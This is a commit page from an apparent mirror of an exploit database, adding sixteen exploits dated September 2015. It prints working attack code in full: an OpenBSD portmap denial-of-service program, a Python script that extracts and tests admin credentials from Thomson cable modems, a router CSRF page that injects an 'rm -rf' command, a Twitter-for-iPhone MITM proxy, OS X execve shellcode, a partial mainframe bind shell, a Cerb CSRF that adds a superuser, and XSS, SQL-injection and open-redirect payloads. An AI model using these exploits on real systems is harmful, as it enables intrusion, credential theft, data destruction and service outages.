bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-09-03

Browse source 
16 new exploits
This commit is contained in:
Offensive Security 2015-09-03 05:02:25 +00:00
parent 7669865812
commit 37dce18f7f
17 changed files with 1220 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

16
files.csv
View file

@ -34083,6 +34083,7 @@ id,file,description,date,author,platform,type,port
37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37755,platforms/windows/local/37755.c,"Windows 2k3 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0
37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting Vulnerability",2012-03-12,K1P0D,multiple,remote,0
37948,platforms/php/webapps/37948.txt,"Wordpress Slideshow Plugin Multiple Cross Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0
37949,platforms/linux/remote/37949.txt,"ModSecurity POST Parameters Security Bypass Vulnerability",2012-10-17,"Bernhard Mueller",linux,remote,0
37950,platforms/php/webapps/37950.txt,"jCore /admin/index.php path Parameter XSS",2012-10-17,"High-Tech Bridge",php,webapps,0
37951,platforms/windows/remote/37951.py,"Easy File Sharing Web Server 6.9 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0
@ -34163,6 +34164,8 @@ id,file,description,date,author,platform,type,port
37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x 'uname()' System Call Local Information Disclosure Vulnerability",2012-10-09,"Brad Spengler",linux,local,0
37938,platforms/php/webapps/37938.txt,"OpenX /www/admin/plugin-index.php parent Parameter XSS",2012-10-10,"High-Tech Bridge",php,webapps,0
37939,platforms/php/webapps/37939.txt,"FileContral Local File Include and Local File Disclosure Vulnerabilities",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0
38066,platforms/php/webapps/38066.txt,"WordPress Video Lead Form Plugin 'errMsg' Parameter Cross Site Scripting Vulnerability",2012-11-29,"Aditya Balapure",php,webapps,0
38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,"Glaysson dos Santos",hardware,webapps,80
37833,platforms/php/webapps/37833.txt,"YCommerce Multiple SQL Injection Vulnerabilities",2012-09-21,"Ricardo Almeida",php,webapps,0
37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 Unspecified Remote Code Execution Vulnerability",2012-09-24,kb,linux,remote,0
37835,platforms/php/webapps/37835.html,"WordPress Cross Site Request Forgery Vulnerability",2012-09-22,AkaStep,php,webapps,0
@ -34367,3 +34370,16 @@ id,file,description,date,author,platform,type,port
38054,platforms/windows/dos/38054.txt,"SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where PoC",2015-09-01,KoreLogic,windows,dos,0
38055,platforms/windows/dos/38055.txt,"XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write PoC",2015-09-01,KoreLogic,windows,dos,0
38056,platforms/hardware/webapps/38056.txt,"Edimax BR6228nS/BR6228nC - Multiple Vulnerabilities",2015-09-01,smash,hardware,webapps,80
38057,platforms/php/webapps/38057.txt,"WordPress Magazine Basic Theme 'id' Parameter SQL Injection Vulnerability",2012-11-22,"Novin hack",php,webapps,0
38058,platforms/ios/remote/38058.py,"Twitter for iPhone Man in the Middle Security Vulnerability",2012-11-23,"Carlos Reventlov",ios,remote,0
38059,platforms/bsd/dos/38059.c,"OpenBSD 4.x Portmap Remote Denial of Service Vulnerability",2012-11-22,auto236751,bsd,dos,0
38060,platforms/php/webapps/38060.txt,"WordPress Ads Box Plugin 'count' Parameter SQL Injection Vulnerability",2012-11-26,"Ashiyane Digital Security Team",php,webapps,0
38061,platforms/php/webapps/38061.txt,"Beat Websites 'id' Parameter SQL Injection Vulnerability",2012-11-24,Metropolis,php,webapps,0
38062,platforms/multiple/webapps/38062.txt,"Forescout CounterACT 'a' Parameter Open Redirection Vulnerability",2012-11-26,"Joseph Sheridan",multiple,webapps,0
38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme 'id' Parameter SQL Injection Vulnerability",2012-11-26,Amirh03in,php,webapps,0
38064,platforms/php/webapps/38064.txt,"WordPress CStar Design 'id' Parameter SQL Injection Vulnerability",2012-11-27,Amirh03in,php,webapps,0
38065,platforms/osx/shellcode/38065.txt,"OS X x64 /bin/sh Shellcode_ NULL Byte Free_ 34 bytes",2015-09-02,"Fitzl Csaba",osx,shellcode,0
38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21
38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution Vulnerability",2015-09-02,"Phan Thanh Duy",hardware,webapps,80
38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80
38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,zedsec390,system_z,shellcode,0

Can't render this file because it is too large.

80
platforms/bsd/dos/38059.c Executable file
View file

@ -0,0 +1,80 @@
source: http://www.securityfocus.com/bid/56671/info
OpenBSD is prone to a remote denial-of-service vulnerability.
Successful exploits may allow the attacker to cause the application to crash, resulting in denial-of-service conditions.
OpenBSD versions prior to 5.2 are vulnerable.
/*
* authors: 22733db72ab3ed94b5f8a1ffcde850251fe6f466
* 6e2d3d47576f746e9e65cb4d7f3aaa1519971189
* c8e74ebd8392fda4788179f9a02bb49337638e7b
*
* greetz: 43c86fd24bd63b100891ec4b861665e97230d6cf
* e4c0f3f28cf322779375b71f1c14d6f8308f789d
* 691cb088c45ec9e31823ca7ab0da8b4cf8079baf
* b234a149e7ef00abc0f2ec7e6cf535ef4872eabc
*
*
* -bash-4.2$ uname -a
* OpenBSD obsd.my.domain 5.1 GENERIC#160 i386
* -bash-4.2$ id
* uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
* -bash-4.2$ netstat -an -f inet | grep 111
* tcp 0 0 127.0.0.1.111 *.* LISTEN
* tcp 0 0 *.111 *.* LISTEN
* udp 0 0 127.0.0.1.111 *.*
* udp 0 0 *.111 *.*
* -bash-4.2$ gcc openbsd_libc_portmap.c
* -bash-4.2$ ./a.out
* [+] This code doesn't deserve 1337 status output.
* [+] Trying to crash portmap on 127.0.0.1:111
* [+] 127.0.0.1:111 is now down.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define HOST "127.0.0.1"
#define PORT 111
#define LOOP 0x100
int main(void)
{
int s, i;
struct sockaddr_in saddr;
printf("[+] This code doesn't deserve 1337 status output.\n");
printf("[+] Trying to crash portmap on %s:%d\n", HOST, PORT);
saddr.sin_family = AF_INET;
saddr.sin_port = htons(PORT);
saddr.sin_addr.s_addr = inet_addr(HOST);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in)) == -1) {
printf("[-] %s:%d is already down.\n", HOST, PORT);
return EXIT_FAILURE;
}
/* # of iteration needed varies but starts working for > 0x30 */
for(i=0; i < LOOP; ++i) {
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in));
send(s, "8========@", 10, 0);
}
if(connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in)) == -1)
printf("[+] %s:%d is now down.\n", HOST, PORT);
else
printf("[-] %s:%d is still listening. Try to increase loop iterations...\n");
return EXIT_SUCCESS;
}

112
platforms/hardware/webapps/38067.py Executable file
View file

@ -0,0 +1,112 @@
###############################################################################
#+-////////////////////////////////////////////////////////////////////////////
#+-
#+- Exploit Title: Thomson Wireless VoIP Cable Modem Arbitrary File Access
#+- Date: October 22, 2013
#+- Author: Glaysson dos Santos
#+-
#+- Product: TWG850-4B Wireless VoIP Cable Modem
#+- Software Version: ST9C.05.08
#+- Hardware Version: 2.1
#+- BOOT Revision: 2.1.7i
#+- Standard Specification Compliant: DOCSIS 2.0
#+- Firmware Name: DWG850-4-9C.05.08-110217-S-1FF.bin
#+- Firmware Build Time 19:19:19 Thu Feb 17 2011
#+- Severity: High
#+-
#+-\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
################################################################################
import string
import urllib2
import sys
from time import sleep
import base64
import binascii
import os
save = 'log_TWG8504B.txt'
log = open(save,'w')
bifi = 'GatewaySettings.bin'
refi = 'RgComputers.asp'
R_C = ("\033[0;31m")
G_C = ("\033[1;32m")
D_C = ("\033[0m" )
def banner():
os.system('clear')
print "\nThomson Wireless VoIP Cable Modem DWG850 -4B (Software Version:ST9C.05.08)- Arbitrary File Read\n \
\t- 2013 - Glaysson dos Santos (0cn1)\n\n"
def hr_data(filename, min=4):
with open(filename, "rb") as f:
result = ""
for c in f.read():
if c in string.printable:
result += c
continue
if len(result) >= min:
yield result
print >> log, result
result = ""
print "(+)- Others Informations Extracted Saved in %s, but you've a Admin Password :D\n"%(save)
def checkcreds(router,username,password):
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm='Thomson',
uri = router,
user = username,
passwd= password)
opener = urllib2.build_opener(auth_handler)
try:
urllib2.install_opener(opener)
status = urllib2.urlopen('%s/%s'%(router,refi))
print '(+)- [status:%s%s%s] Authenticated successfuly, Enjoy it!'%(G_C,status.code,D_C)
except urllib2.URLError, e:
if e.code == 401:
print '(+)- [status:%s%s%s] Invalid Credentials! Try yourself in a browser.'%(R_C,e.code,D_C)
def checkvuln(router):
try:
print '(+)- Checking if target is vulnerable...'
req = urllib2.Request('%s/%s'%(router,bifi))
response = urllib2.urlopen(req)
page = response.read()
x = open(bifi,'wb')
x.write(page)
x.close()
sleep(1)
print '(+)- The target appears to be vulnerable, lets check it better!'
print '(+)- Searching Credentials...'
sleep(1)
for s in hr_data(bifi):
try:
dec = base64.decodestring(s)
if dec.find(':') != -1:
user,passwd = dec.split(':')
print '(+)- User: %s%s%s'%(G_C,user,D_C)
print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C)
print '(+)- Checking if creds are OK...'
checkcreds(router,user,passwd)
except(binascii.Error):
pass
except urllib2.URLError, e:
print '[$] hollyshit! the target is not vuln! o.O (%s%s%s)'%(R_C,e.reason[1],D_C)
sys.exit(1)
if __name__ == "__main__":
banner()
if len(sys.argv) != 2:
print '[!] %sRun %s router IP%s\n'%(R_C,sys.argv[0],D_C)
sys.exit(2)
router = sys.argv[1]
if not "http" in router:
router = "http://"+(sys.argv[1])
checkvuln(router)

48
platforms/hardware/webapps/38073.html Executable file
View file

@ -0,0 +1,48 @@
<!--
######################################################################
# Exploit Title: GPON Home CSRF With Command ExecuteVulnerability
# Author: Phan Thanh Duy (logicaway) - KAISAI12 (ceh.vn)
# E-mail:(facebook https://www.facebook.com/duy.phanthanh.75),(
https://www.facebook.com/kai.sai.35)
# Category: Hardware
# Google Dork: N/A
# Vendor: FTP Viet Nam
# Firmware Version: 3.0.0 Build 120531
# Product: FTP G-93RG1
#
#
# Tested on: Windows 8 64-bit
######################################################################
#Introduction
==============
#Description of Vulnerability
=============================
Execute command with CSRF
#Exploit
========
-->
<html>
<head>
<title>CSRF Demo Exploit</title>
</head>
<body>
<form name="auto" method="POST"
action="http://192.168.1.1/GponForm/diag_XForm"
enctype="multipart/form-data">
<input type="hidden" name="XWebPageName" value="diag"/>
<input type="hidden" name="diag_action" value="ping"/>
<input type="hidden" name="wan_conlist" value="0"/>
<input type="hidden" name="dest_host" value="`rm -rf stuff`"/>
<input type="hidden" name="ipver" value="0"/>
<!-- input type="submit" name="submit"/> -->
</form>
<script type="text/javascript">
document.auto.submit();
</script>
</body>
</html>

115
platforms/ios/remote/38058.py Executable file
View file

@ -0,0 +1,115 @@
source: http://www.securityfocus.com/bid/56665/info
Twitter for iPhone is prone to a security vulnerability that lets attackers to perform a man-in-the-middle attack.
Attackers can exploit this issue to capture and modify pictures that the user sees in the application.
Twitter for iPhone 5.0 is vulnerable; other versions may also be affected.
/*
Twitter App, eavesdroping PoC
Written by Carlos Reventlov <carlos@reventlov.com>
License MIT
*/
package main
import (
"fmt"
"github.com/xiam/hyperfox/proxy"
"github.com/xiam/hyperfox/tools/logger"
"io"
"log"
"os"
"path"
"strconv"
"strings"
)
const imageFile = "spoof.jpg"
func init() {
_, err := os.Stat(imageFile)
if err != nil {
panic(err.Error())
}
}
func replaceAvatar(pr *proxy.ProxyRequest) error {
stat, _ := os.Stat(imageFile)
image, _ := os.Open(imageFile)
host := pr.Response.Request.Host
if strings.HasSuffix(host, "twimg.com") == true {
if pr.Response.ContentLength != 0 {
file := "saved" + proxy.PS + pr.FileName
var ext string
contentType := pr.Response.Header.Get("Content-Type")
switch contentType {
case "image/jpeg":
ext = ".jpg"
case "image/gif":
ext = ".gif"
case "image/png":
ext = ".png"
case "image/tiff":
ext = ".tiff"
}
if ext != "" {
fmt.Printf("** Saving image.\n")
os.MkdirAll(path.Dir(file), os.ModeDir|os.FileMode(0755))
fp, _ := os.Create(file)
if fp == nil {
fmt.Errorf(fmt.Sprintf("Could not open file %s for writing.", file))
}
io.Copy(fp, pr.Response.Body)
fp.Close()
pr.Response.Body.Close()
}
}
fmt.Printf("** Sending bogus image.\n")
pr.Response.ContentLength = stat.Size()
pr.Response.Header.Set("Content-Type", "image/jpeg")
pr.Response.Header.Set("Content-Length",
strconv.Itoa(int(pr.Response.ContentLength)))
pr.Response.Body = image
}
return nil
}
func main() {
p := proxy.New()
p.AddDirector(logger.Client(os.Stdout))
p.AddInterceptor(replaceAvatar)
p.AddLogger(logger.Server(os.Stdout))
var err error
err = p.Start()
if err != nil {
log.Printf(fmt.Sprintf("Failed to bind: %s.\n", err.Error()))
}
}

9
platforms/multiple/webapps/38062.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56687/info
Forescout CounterACT is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input.
A successful exploit may aid in phishing attacks; other attacks are possible.
Forescout CounterACT 6.3.4.1 is vulnerable; other versions may also be affected.
http://www.example.com/assets/login?a=http://www.evil.com

66
platforms/osx/shellcode/38065.txt Executable file
View file

@ -0,0 +1,66 @@
[*] Author: Csaba Fitzl, @theevilbit
[*] Tested on OS X 10.10.5
[*] OS X x64 /bin/sh shellcode, NULL byte free, 34 bytes
[*] Assembly version
[*] binsh-shellcode.asm
[*] ./nasm -f macho64 binsh-shellcode.asm
[*] ld -macosx_version_min 10.7.0 -o binsh-shellcode binsh-shellcode.o
-------------------------------------------------------------------------------
BITS 64
global start
section .text
start:
xor rsi,rsi ;zero out RSI
push rsi ;push NULL on stack
mov rdi, 0x68732f6e69622f2f ;mov //bin/sh string to RDI (reverse)
push rdi ;push rdi to the stack
mov rdi, rsp ;store RSP (points to the command string) in RDI
xor rdx, rdx ;zero out RDX
;store syscall number on RAX
xor rax,rax ;zero out RAX
mov al,2 ;put 2 to AL -> RAX = 0x0000000000000002
ror rax, 0x28 ;rotate the 2 -> RAX = 0x0000000002000000
mov al,0x3b ;move 3b to AL (execve SYSCALL#) -> RAX = 0x000000000200003b
syscall ;trigger syscall
-------------------------------------------------------------------------------
[*] C version
[*] Get the hex opcodes from the object file: otool -t binsh-shellcode.o
[*] binsh-shellcode.c
[*] Compile: gcc binsh-shellcode.c -o sc
[*] Run: ./sc
-------------------------------------------------------------------------------
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] =
"\x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x48\x89\xe7\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05";
int main(int argc, char **argv) {
void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON
| MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}
memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;
sc();
return 0;
}
-------------------------------------------------------------------------------

19
platforms/php/webapps/37948.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/56090/info
The Slideshow plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=";><script>alert(123);</script>
http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=<script>alert(123);</script>
http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?settings=<body+onload='alert(123)'>
http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=<script>alert(123);</script>
http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings
http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0][3]=<script>alert(123);</script>
http://www.example.com/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=<script>alert(123);</script>

7
platforms/php/webapps/38057.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56664/info
The Magazine Basic theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/themes/magazine-basic/view_artist.php?id=[SQL]

7
platforms/php/webapps/38060.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56681/info
The Ads Box plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/ads-box/iframe_ampl.php?count=[SQLi]

11
platforms/php/webapps/38061.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/56683/info
Beat Websites is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Beat Websites 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/page_detail.php?id=1 and 1=1
http://www.example.com/page_detail.php?id=1 and 1=2

7
platforms/php/webapps/38063.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56691/info
The Wp-ImageZoom theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/wp-imagezoom/zoom.php?id=[SQL]

7
platforms/php/webapps/38064.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/56694/info
The CStar Design theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/themes/cstardesign/swf/flashmo/flashmoXML.php?id=[SQL]

9
platforms/php/webapps/38066.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56737/info
The Video Lead Form plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Video Lead Form 0.5 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-admin/admin.php?page=video-lead-form&errMsg=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

81
platforms/php/webapps/38074.txt Executable file
View file

@ -0,0 +1,81 @@
Advisory ID: HTB23269
Product: Cerb
Vendor: Webgroup Media LLC
Vulnerable Version(s): 7.0.3 and probably prior
Tested Version: 7.0.3
Advisory Publication: August 12, 2015 [without technical details]
Vendor Notification: August 12, 2015
Vendor Patch: August 14, 2015
Public Disclosure: September 2, 2015
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-6545
Risk Level: Medium
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered CSRF vulnerability in Cerb platform, which can be exploited to perform Cross-Site Request Forgery attacks against administrators of vulnerable web application to add administrate accounts into the system.
The vulnerability exists due to failure of the "/ajax.php" script to properly verify the source of incoming HTTP request. Taking into consideration that Cerb is a business-critical application, this security flaw may be quite dangerous if exploited by malicious attackers.
A simple exploit below will add admin user into the system when a logged-in victim opens a malicious page with the exploit:
<form action="http://[host]/ajax.php" method = "POST">
<input type="hidden" name="c" value="config">
<input type="hidden" name="a" value="handleSectionAction">
<input type="hidden" name="section" value="workers">
<input type="hidden" name="action" value="saveWorkerPeek">
<input type="hidden" name="id" value="0">
<input type="hidden" name="view_id" value="workers_cfg">
<input type="hidden" name="do_delete" value="0">
<input type="hidden" name="first_name" value="first name">
<input type="hidden" name="last_name" value="last name">
<input type="hidden" name="title" value="title">
<input type="hidden" name="email" value="username@mail.com">
<input type="hidden" name="at_mention_name" value="name">
<input type="hidden" name="is_disabled" value="0">
<input type="hidden" name="is_superuser" value="1">
<input type="hidden" name="lang_code" value="en_US">
<input type="hidden" name="timezone" value="Antarctica%2FTroll">
<input type="hidden" name="time_format" value="D%2C+d+M+Y+h%3Ai+a">
<input type="hidden" name="auth_extension_id" value="login.password">
<input type="hidden" name="password_new" value="password">
<input type="hidden" name="password_verify" value="password">
<input type="hidden" name="calendar_id" value="new">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>
-----------------------------------------------------------------------------------------------
Solution:
Update to Cerb 7.0.4
More Information:
https://github.com/wgm/cerb/commit/12de87ff9961a4f3ad2946c8f47dd0c260607144
http://wiki.cerbweb.com/7.0#7.0.4
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23269 - https://www.htbridge.com/advisory/HTB23269 - Cross-Site Request Forgery in Cerb.
[2] Cerb - http://www.cerberusweb.com/ - Cerb is a fast and flexible platform for enterprise collaboration, productivity, and automation.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

610
platforms/system_z/shellcode/38075.txt Executable file
View file

@ -0,0 +1,610 @@
TITLE 'bind shell for mainframe/system Z'
BINDSH CSECT
BINDSH AMODE 31
BINDSH RMODE ANY
***********************************************************************
* *
* @SETUP registers and save areas *
* *
***********************************************************************
@SETUP DS 0F # full word boundary
STM 14,12,12(13) # save our registers
LARL 15,@SETUP # base address into R15
LR 8,15 # copy R15 to R8
USING @SETUP,8 # R8 for addressability throughout
LARL 11,SAVEAREA # sa address
ST 13,4(,11) # save callers save area
LR 13,11 # R13 to our save area
DS 0H # halfword boundaries
***********************************************************************
* *
* @LOADFS - load all the functions we need *
* for SC loop this *
* *
***********************************************************************
@LOADFS L 2,FFUNC # first function we use
LHI 3,8 # used for our index
L 4,NUMFUNC # number of functions to load
@LDLOOP LR 0,2 # load string of func name
XR 1,1 # clear R1
SVC 8 # perform LOAD
XC 0(8,2),0(2) # clear current Func space
ST 0,0(0,2) # store addr in func space
AR 2,3 # increment R2 by 8
AHI 4,-1 # decrement R4
CIB 4,0,2,@LDLOOP # compare R4 with 0,if GT loop
***********************************************************************
* *
* Create pipes to be used to communicate with child proc *
* that will be created in upcoming forking *
* *
***********************************************************************
@CPIPES LARL 14,@CFD
BRC 15,LPIPE # get FDs for child proc
@CFD ST 5,CFDR # store child read fd
ST 6,CFDW # store child write fd
@CPIPE2 LARL 14,@PFD
BRC 15,LPIPE # get FDs for parent proc
@PFD ST 5,PFDR # store parent read fd
ST 6,PFDW # store parent write fd
***********************************************************************
* *
* BP1FRK (FORK) fork a child process *
* *
***********************************************************************
LFORK L 15,BFRK # load func addr to 15
CALL (15),(CPROCN,RTN_COD,RSN_COD),VL
BRAS 0,@PREPCHL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,1 # load 1 for RC / Debugging
L 6,CPROCN # locad Ret val in R6
CIB 6,-1,8,EXITP # compare R6 to -1 and jump if eq
****************************************************
* prepare the child process for exec , only runs *
* if CPROCN (child pid from fork) equals 0 *
****************************************************
@PREPCHL L 2,CPROCN # load child proc # to R2
CIB 2,0,7,@PREPPAR # R2 not 0? We are parent, move on
*************************************************
* order of things to prep child pid *
* 0) Close parent write fd *
* 1) Close child read fd *
* 2) dupe parent read fd to std input *
* 3) dupe child write fd to std output *
* 4) dupe child write fd to std err *
* 5) Close parent read fd *
* 6) Close child write fd *
* 7) exec /bin/sh *
*************************************************
LARL 14,@PRC1
LA 2,F_CLOSFD
L 5,PFDW # load R5 with pfdw
L 6,PFDW # load R5 with pfdw
@PRC0 BRC 15,LFCNTL # call close
@PRC1 LARL 14,@PRC2
LA 2,F_CLOSFD
L 5,CFDR # load R5 with cfdr
L 6,CFDR # load R5 with cfdr
BRC 15,LFCNTL # call close
@PRC2 LARL 14,@PRC3
LA 2,F_DUPFD2 # gonna do a dup2
L 5,PFDR # parent read fd
LGFI 6,0 # std input
BRC 15,LFCNTL # call dupe2
@PRC3 LARL 14,@PRC4
LA 2,F_DUPFD2 # gonna do a dup2
L 5,CFDW # child write fd
LGFI 6,1 # std output
BRC 15,LFCNTL # call dupe2
@PRC4 LARL 14,@PRC5 # if 0 we are in child pid, goto exec
LA 2,F_DUPFD2 # gonna do a dup2
L 5,CFDW # child write fd
LGFI 6,2 # std error
BRC 15,LFCNTL # call dupe2
@PRC5 LARL 14,@PRC6
LA 2,F_CLOSFD
L 5,PFDR # load R5 with pfdr
L 6,PFDR # load R5 with pfdr
BRC 15,LFCNTL # call close
@PRC6 LARL 14,@PRC7
LA 2,F_CLOSFD
L 5,CFDW # load R5 with cfdw
L 6,CFDW # load R5 with cfdw
BRC 15,LFCNTL # call close
@PRC7 BRAS 0,LEXEC
***********************************************************************
* *
* BP1EXC (EXEC) execute shell '/bin/sh' *
* *
***********************************************************************
LEXEC L 15,BEXC # load func addr to 15
CALL (15),(EXCMDL,EXCMD,EXARGC,EXARGLL,EXARGL, x
EXENVC,EXENVLL,EXENVL, x
EXITRA,EXITPLA, x
RTN_VAL,RTN_COD,RSN_COD),VL
BRAS 0,GOODEX # exit child proc after exec
****************************************************
* prepare the parent process to speak with child *
* order of things to prep parent pid *
* 0) close parent fd read *
* 1) close child fd write *
* 2) socket,bind,accept,listen,read & write *
* 3) set client socked and child fd write *
* to non_blocking *
****************************************************
@PREPPAR LARL 14,@PRP1
LA 2,F_CLOSFD
L 5,PFDR # load R5 with pfdr
L 6,PFDR # load R5 with pfdr
BRC 15,LFCNTL # call close
@PRP1 LARL 14,LSOCK
LA 2,F_CLOSFD
L 5,CFDW # load R5 with cfdw
L 6,CFDW # load R5 with cfdw
BRC 15,LFCNTL # call close
***********************************************************************
* *
* BPX1SOC set up socket - inline *
* *
***********************************************************************
LSOCK L 15,BSOC # load func addr to 15
CALL (15),(DOM,TYPE,PROTO,DIM,SRVFD, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,2
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPC1BND (bind) bind to socket - inline *
* *
***********************************************************************
LBIND L 15,BBND # load func addr to 15
LA 5,SRVSKT # addr of our socket
USING SOCKADDR,5 # layout sockaddr over R5
XC SOCKADDR(16),SOCKADDR # zero sock addr struct
MVI SOCK_FAMILY,AF_INET # family inet
MVI SOCK_LEN,SOCK#LEN # len of socket
MVC SOCK_SIN_PORT,LISTSOCK # list on PORT 12345
